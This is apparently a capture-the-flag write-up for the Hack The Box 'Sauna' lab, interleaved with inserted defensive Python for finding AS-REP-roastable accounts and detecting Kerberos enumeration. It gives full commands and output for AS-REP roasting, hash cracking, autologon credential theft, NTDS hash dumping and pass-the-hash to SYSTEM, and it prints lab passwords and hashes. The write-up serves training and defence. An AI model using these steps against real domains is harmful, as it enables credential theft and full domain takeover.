A fairly easy Windows machine that requires a little 'outside the box' thinking in order to get the initial foothold. After that, simple enumeration will give everything else that is needed.
Adding the flag -just-dc-ntlm to secretsdump.py makes it dump only the LanMan (LM) and NT hashes.
GetNPUsers.py
Extracts the Kerberos krb5asrep hashes for users from the domain controller. It requires a valid DOMAINNAME/username pair to run, and it will only extract hashes for users that do not require Kerberos pre-authentication.
In this example the output will be in hashcat format.
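As an added example (my code, not the writeup's and not part of Impacket), the check a defender would run to find the accounts GetNPUsers.py can pull a hash for: decode the userAccountControl bitmask and report enabled accounts with UF_DONT_REQUIRE_PREAUTH set. The entries are constructed in the shape an LDAP search for sAMAccountName and userAccountControl returns; the asrep_roastable and ldap_filter helper names are mine.

```python
# Added example, not from the writeup or Impacket: find enabled accounts that
# do not require Kerberos pre-authentication, i.e. the ones GetNPUsers.py can
# pull an AS-REP hash for. Works offline on entries shaped like LDAP results.
UF_ACCOUNTDISABLE = 0x0002          # userAccountControl bit: account disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the flag GetNPUsers.py reports on
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample entries; the bit values are illustrative, not taken from
# the target. 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "hsmith", "userAccountControl": 0x10200},
    {"sAMAccountName": "fsmith", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 0x10200},
]


def asrep_roastable(entries):
    """Return sAMAccountNames of enabled accounts with UF_DONT_REQUIRE_PREAUTH set.

    Disabled accounts are skipped: the KDC will not issue them a TGT anyway,
    but they still deserve a cleanup ticket."""
    hits = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            hits.append(entry["sAMAccountName"])
    return hits


def ldap_filter():
    """The same check as an LDAP filter, for running against the directory
    directly (bitwise-AND matching rule on userAccountControl)."""
    rule = "userAccountControl:%s:=%%d" % LDAP_MATCHING_RULE_BIT_AND
    return "(&(objectCategory=person)(objectClass=user)(%s)(!(%s)))" % (
        rule % UF_DONT_REQUIRE_PREAUTH, rule % UF_ACCOUNTDISABLE)


if __name__ == "__main__":
    print("accounts without pre-auth:", asrep_roastable(SAMPLE_ENTRIES))
    print("ldap filter:", ldap_filter())
```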
Extracting Windows Auto-logon credentials with reg query
The command reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" will output any stored Windows Auto-logon credentials.
Using hashcat to crack Kerberos hashes
In order to crack krb5asrep type hashes the -m 18200 option is needed.
hashcat -m 18200 -a 0 <input_file> <wordlist> --force
Enumerating valid usernames through Kerberos using Metasploit
In the Metasploit console the auxiliary(gather/kerberos_enumusers) tool enumerates valid users against Kerberos from a list. This scanner also checks if each user has "pre-auth required" enabled.
Enumeration
Nmap scan
I started my enumeration with an nmap scan of 10.10.10.175. The options I regularly use are: -p-, which is a shortcut that tells nmap to scan all ports; -sC, which is the equivalent of --script=default and runs a collection of nmap enumeration scripts against the target; -sV, which does a service scan; and -oN, which saves the output with a filename of <name>.
zweilos@kalimaa:~/htb/sauna$ sudo nmap -p- -sC -sV -oN sauna.nmap 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 14:07 EDT
Nmap scan report for 10.10.10.175
Host is up (0.14s latency).
Scanned at 2020-06-01 14:07:43 EDT for 553s
Not shown: 65515 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-02 01:15:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
| ssl-date:
|_ ERROR: Unable to obtain data from the target
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
| ssl-date:
|_ ERROR: Unable to obtain data from the target
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
| ssl-date:
|_ ERROR: Unable to obtain data from the target
3269/tcp open tcpwrapped
| ssl-date:
|_ ERROR: Unable to obtain data from the target
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
61610/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/1%Time=5ED544ED%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h04m02s
| nbstat:
|_ ERROR: Name query failed: TIMEOUT
| smb-os-discovery:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-security-mode:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-02T01:18:23
|_ start_date: N/A
Final times for host: srtt: 137789 rttvar: 1734 to: 144725
Nmap done: 1 IP address (1 host up) scanned in 553.41 seconds
Lots of ports were open on this machine! Based on the plethora of related ports, it was fairly easy to guess that this machine was a Windows-based domain server.
Hmm... not much to go off from LDAP, though I was able to find one potential user named Hugo Smith (unfortunately there was no Windows username to go with it.)
Egotistical Bank website
On port 80 I found a website hosted for Egotistical Bank. Most of this site consisted of template pages with lots of lorem ipsum paragraphs and very little information. One page caught my eye, however.
I found a list of potential users on the 'About Us' page under the "Meet The Team" heading. Since these were potentially employees at Egotistical Bank I used some common username formats to turn these names into potential usernames, then proceeded to test if any of them were valid.
This was my list of possible usernames based on common business formats I have seen in the past. There was also one user's name (Hugo Smith) that I had gotten from ldapsearch that was not on the website, so I added it to the list as well.
Road to User
Finding user creds
Finding user credentials was pretty fast and straightforward for this machine, despite not having a lot of information to go on. I fed my list of potential usernames to the Metasploit module auxiliary/gather/kerberos_enumusers to check whether any of these usernames were valid, and whether they had Kerberos pre-authentication turned off. This setting is a security feature of Kerberos which gives protection against password-guessing brute force attacks.
msf5 auxiliary(gather/kerberos_enumusers) > run
[*] Running module against 10.10.10.175
[*] Validating options...
[*] Using domain: EGOTISTICALBANK...
[*] 10.10.10.175:88 - Testing User: "hsmith"...
[*] 10.10.10.175:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.175:88 - User: "hsmith" is present
After running this scan, I only got back one hit for a valid username: hsmith. I now had a valid username and the business format for other potential usernames. One oddity I noticed: the scan would crash Metasploit for some reason when it got to the name fsmith (I tried this multiple times with and without that name to be sure). I kept this username on the possibly valid list just in case.
zweilos@kalimaa:~/impacket/examples$ python3 GetNPUsers.py -outputfile sauna.hash -format hashcat -usersfile /home/zweilos/htb/sauna/users -no-pass -dc-ip 10.10.10.175 EGOTISTICALBANK/hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Since fsmith crashed Metasploit I was hoping that it was because there was something in the output that it didn't understand. I decided to use another script that would give the same information to me, but would also dump the Kerberos hashes for any users who did not require the pre-authentication check. I used the GetNPUsers.py tool from the Impacket python examples collection to try to get the krb5asrep hashes using . In order to pull these hashes you need a valid username in the format DOMAINNAME/username. Luckily I had the domain name from my early enumeration and a valid username that Metasploit had gotten from the domain controller. I set my output to be saved in hashcat format so I could use that tool to try to quickly crack the hash.
At first I thought that I was just getting back the same results as the Metasploit module, until I counted the number of names that it was outputting results for. I realized that there was one result unaccounted for, so I looked in the output directory and opened my output file sauna.hash to see if I had gotten any hits.
It contained the Kerberos hash for the user fsmith! I had been right in my hunch that it was still a valid username despite the odd Metasploit behavior earlier.
I am not sure why GetNPUsers.py doesn't inform you when it finds a valid user and gets the hash, so pay attention to your output files!
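The username enumeration above (valid names answered with KDC_ERR_PREAUTH_REQUIRED, invalid ones with KDC_ERR_C_PRINCIPAL_UNKNOWN) and the hash extraction for the one account without pre-authentication both leave traces on the domain controller. The added example below (my code, not the writeup's or any of its tools') runs two detection rules over constructed Windows Security event 4768 (TGT request) records reduced to the fields the rules need; the field names, timestamps and source IPs are my assumptions, the usernames follow the writeup.

```python
# Added example, not from the writeup or any of the tools it uses: detection
# logic for the two Kerberos behaviours above, run over constructed Windows
# Security event 4768 (TGT request) records. Keys are simplified from the
# event XML: "status" is Result Code, "preauth" is Pre-Authentication Type,
# "etype" is Ticket Encryption Type, "ip" is Client Address.
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # the reply GetNPUsers.py printed for invalid names
PREAUTH_NONE = "0"                    # Pre-Authentication Type 0: logon without pre-auth
RC4_HMAC = "0x17"                     # RC4 ticket, the crackable reply AS-REP roasting asks for

# Constructed sample: one source tries the username guesses from the writeup,
# then pulls an AS-REP for fsmith; a later normal logon comes from elsewhere.
SAMPLE_4768 = [
    {"ts": "2020-06-02T01:20:00", "user": "hugo.smith", "status": "0x6", "preauth": "-", "etype": "-", "ip": "10.10.14.5"},
    {"ts": "2020-06-02T01:20:01", "user": "hugosmith", "status": "0x6", "preauth": "-", "etype": "-", "ip": "10.10.14.5"},
    {"ts": "2020-06-02T01:20:02", "user": "smithh", "status": "0x6", "preauth": "-", "etype": "-", "ip": "10.10.14.5"},
    {"ts": "2020-06-02T01:20:03", "user": "h.smith", "status": "0x6", "preauth": "-", "etype": "-", "ip": "10.10.14.5"},
    {"ts": "2020-06-02T01:20:04", "user": "shugo", "status": "0x6", "preauth": "-", "etype": "-", "ip": "10.10.14.5"},
    {"ts": "2020-06-02T01:20:09", "user": "fsmith", "status": "0x0", "preauth": "0", "etype": "0x17", "ip": "10.10.14.5"},
    {"ts": "2020-06-02T01:30:00", "user": "fsmith", "status": "0x0", "preauth": "2", "etype": "0x12", "ip": "10.10.10.20"},
]


def kerberos_user_enumeration(events, threshold=5, window_minutes=5):
    """Map source IP -> guessed names for sources that asked for TGTs of at
    least `threshold` distinct unknown principals inside the window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[e["ip"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            names = {u for t, u in hits[i:] if t - start <= timedelta(minutes=window_minutes)}
            if len(names) >= threshold:
                flagged[ip] = sorted(names)
                break
    return flagged


def asrep_roast_requests(events):
    """(ip, user) pairs that obtained a TGT with no pre-authentication and an
    RC4 encrypted reply: the AS-REP that hashcat mode 18200 cracks."""
    return [(e["ip"], e["user"]) for e in events
            if e["status"] == "0x0" and e["preauth"] == PREAUTH_NONE and e["etype"] == RC4_HMAC]


if __name__ == "__main__":
    print("enumeration sources:", kerberos_user_enumeration(SAMPLE_4768))
    print("AS-REP roast requests:", asrep_roast_requests(SAMPLE_4768))
```

The second rule is also the one that fires when GetNPUsers.py finds a hit it does not announce on the console, so it is worth alerting on even at low volume.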
Next I fired up hashcat to try to crack the password hash. The option -m 18200 is the flag which tells hashcat that this is a krb5asrep type hash and -a 0 makes it use the words straight from the specified wordlist without any mangling rules applied.
Including the time spent building the dictionary file and getting everything loaded, this hash took less than two minutes to be cracked using hashcat. The password for fsmith was apparently Thestrokes23 (to see it in the output above you have to scroll all the way to the right...the output shows it at the end of the hash string).
User.txt
Now that I had a username and password, I could try to log into the server using evil-winrm. This tool connects to the Windows Remote Management service that is usually open on port 5985.
zweilos@kalimaa:~/htb/sauna$ evil-winrm -i 10.10.10.175 -u fsmith
Enter Password: Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\FSmith\Documents>
Luckily for me fsmith was a member of the Remote Management Users group and I was able to log in. Next I collected my hard-earned loot.
After running the command whoami /all, my next step when gaining access as a new user is to do as much enumeration as possible. The Windows Privilege Escalation Awesome Scripts (WinPEAS) tool is a collection of scripts that make this enumeration extremely simple. In this case, it made moving laterally to another user very easy to complete.
--Cut from WinPEAS.exe--
C:\Windows\System32\OpenSSH\
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
[+] Home folders found(T1087&T1083&T1033)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith
C:\Users\Public
C:\Users\svc_loanmgr
Auto-logon is a terrible, terrible service that should never be used, but it makes things convenient for users when they are the only ones who use a computer. As the name implies, Windows will automatically log the user on by caching their credentials. I verified this output by looking up the registry key where this information is stored using the reg query command. Auto-logon credentials are stored in the key HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon.
For some reason there was a discrepancy between the username of the account that had auto-logon enabled (svc_loanmanager), and the account that had a user folder on the machine (svc_loanmgr). I decided to try logging in using svc_loanmgr since that was the name of the user's folder.
Moving laterally to user svc_loanmgr
zweilos@kalimaa:~/htb/sauna$ evil-winrm -i 10.10.10.175 -u svc_loanmgr
Enter Password: Moneymakestheworldgoround!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
If you have credentials you can use Impacket's secretsdump.py to try to dump password hashes. These hashes can then be used to either crack and retrieve the passwords or in a pass-the-hash attack.
zweilos@kalimaa:~/impacket/examples$ python3 ./secretsdump.py -just-dc-ntlm EGOTISTICALBANK/svc_loanmgr@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:21e6b7db7208776337bf12e6c910a32d:::
[*] Cleaning up...
After successfully extracting the password hash for the Administrator account I decided to practice doing a pass-the-hash attack (I didn't attempt to crack the hashes to extract the passwords so I cannot say how long it might take!).
Getting a shell
The blog at https://en.hackndo.com/pass-the-hash/ has a nice write-up on how and why pass-the-hash attacks work. I used the psexec.py tool from Impacket's examples, though there are many tools for doing this attack against Windows.
zweilos@kalimaa:~/impacket/examples$ sudo python3 psexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.22.dev1+20200520.120526.3f1e7ddd - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file useqULkm.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service hsLI on 10.10.10.175.....
[*] Starting service hsLI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Not only did this tool log me in, but it also elevated my privilege to nt authority\system!
Root.txt
The final thing to do after gaining full control over this machine was to get my proof.
Thanks to egotisticalSW for creating this fun and easy Windows machine. It offered a few chances to learn some new things while giving the opportunity to brush up on Windows enumeration skills.
If you like this content and would like to see more, please consider buying me a coffee!